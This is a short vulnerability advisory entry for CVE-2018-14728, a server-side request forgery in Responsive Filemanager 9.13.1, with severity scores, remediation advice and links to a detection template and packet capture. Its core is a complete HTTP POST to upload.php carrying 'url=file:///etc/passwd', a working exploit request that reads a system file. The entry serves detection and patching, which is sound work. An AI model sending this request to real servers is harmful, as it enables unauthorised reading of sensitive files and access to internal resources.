| Title | Responsive filemanager 9.13.1 Server-Side Request Forgery |
|---|---|
| Author | madrobot |
| Severity | Critical |
| Impact | An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. |
| Remediation | Upgrade to a patched version of Responsive Filemanager or apply the necessary security patches to mitigate the SSRF vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.90868 |
| CVE ID | CVE-2018-14728 |
| CWE ID | CWE-918 |
| Tags | cve2018 cve ssrf lfi packetstorm edb intrusive tecrail vuln |
Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter.
POST /filemanager/upload.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Connection: close
Content-Length: 28
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
fldr=&url=file:///etc/passwd
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-14728.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-14728.pcap
N/AN/A